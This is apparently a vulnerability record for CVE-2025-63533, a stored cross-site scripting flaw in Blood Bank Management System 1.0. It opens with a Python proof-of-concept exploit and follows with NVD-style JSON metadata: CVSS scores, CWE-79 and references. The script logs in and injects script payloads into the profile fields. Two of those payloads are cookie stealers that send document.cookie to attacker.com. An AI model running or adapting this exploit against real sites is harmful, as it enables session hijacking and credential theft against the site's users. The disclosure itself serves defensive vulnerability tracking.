CVE-2025-63533

# CVE-2025-63533 XSS PoC - Blood Bank Management System 1.0 # Affected Components: updateprofile.php, rprofile.php # Vulnerable Parameters: rname, remail, rpassword, rphone, rcity import requests import sys target_url = "http://target.com/Blood-Bank-Management-System/updateprofile.php" login_url = "http://target.com/Blood-Bank-Management-System/login.php" # XSS Payload - Cookie Stealer xss_payload = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>" def exploit_xss(): session = requests.Session() # Step 1: Login with low privilege account login_data = { 'username': 'attacker', 'password': 'password123' } session.post(login_url, data=login_data) # Step 2: Inject XSS payload via profile update profile_data = { 'rname': xss_payload, 'remail': '<script>alert("XSS")</script>', 'rpassword': 'test123', 'rphone': '<img src=x onerror=alert(document.cookie)>', 'rcity': '<svg/onload=fetch("http://attacker.com/steal?"+btoa(document.cookie))>' } response = session.post(target_url, data=profile_data) print(f"[+] XSS payload sent, check if stored in profile page") print(f"[+] Payload: {xss_payload}") return True if __name__ == "__main__": exploit_xss()

{"cve": {"id": "CVE-2025-63533", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:55.960", "lastModified": "2025-12-04T18:07:58.263", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the updateprofile.php and rprofile.php components. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the rname, remail, rpassword, rphone, rcity parameters, which are then executed in the victim's browser when the page is viewed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63533.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}